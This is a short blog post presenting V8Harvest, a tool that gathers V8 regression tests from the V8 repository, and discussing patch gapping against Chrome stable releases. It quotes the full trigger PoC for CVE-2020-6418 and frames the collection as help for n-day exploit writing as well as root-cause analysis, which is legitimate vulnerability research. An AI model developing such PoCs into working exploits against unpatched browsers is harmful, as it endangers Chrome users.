Introduction

During my research into Javascript Engine (V8), I have created a small tool to help you view recent V8 bugs that contains regression test on a single page. Since most of the time, regression test often contains PoC to trigger the bug, it’s pretty useful to analyze them to find the root cause and writing exploit for the n-day bug.

For example, regress-1053604.js contains the PoC to trigger the side-effect in kJSCreate opcode (CVE-2020-6418).

let a = [0, 1, 2, 3, 4];
function empty() {}
function f(p) {
  a.pop(Reflect.construct(empty, arguments, p));
}
let p = new Proxy(Object, {
  get: () => (a[0] = 1.1, Object.prototype)
});
function main(p) {
  f(p);
}
%PrepareFunctionForOptimization(empty);
%PrepareFunctionForOptimization(f);
%PrepareFunctionForOptimization(main);
main(empty);
main(empty);
%OptimizeFunctionOnNextCall(main);
main(p);

Sometimes, due to Chrome’s release pipeline, the vulns got fixed in V8 may not be fixed in the latest Chrome stable version. Due to that, some exploit developers often do patch gapping on Chrome. Since patch gapping is a race against time, having the regression test exposed with the bug fix commit or not make a big difference. For example, regress-1196683.js was also submitted with this bug fix on April 12th, and this bug fix was not applied to Chrome stable until April 13th. Some security researchers have already written their exploit code based on the regression test and publish it on Twitter during that time.

Just a day later, on April 14th, regress-1195777.js was also submitted with this bug fix. Based on that regression test, the exploit code was leaked on the internet once again. And this time, it was not applied to the latest Chrome stable until April 20th, one week later.

How It Work

The tool simply parsed all regress-* files under the directory and sub-directory of /src/v8/test/mjsunit/

From there, I used git log to retrieve pieces of information related to the regress file.

git log -1 --name-only /path/to/regress/file

Each regress will contain these informations :

The output will look like the following image

Using this method, I have gathered a large set of PoCs/Regression tests with related information, ordered by committed time and divided by year, from 2016 to 2021. See V8 Harvest.

How To Use

Install the following python3 lib

python3 -m pip install GitPython
python3 -m pip install tqdm

Clone the V8 git repo to your local machine

git clone https://github.com/v8/v8.git

Grab v8Harvest.py from https://github.com/star-sg/V8Harvest

Put v8Harvest.py in V8’s folder and run it, output will be named output.md

I hope that this tool will be useful or benefits some of you out there.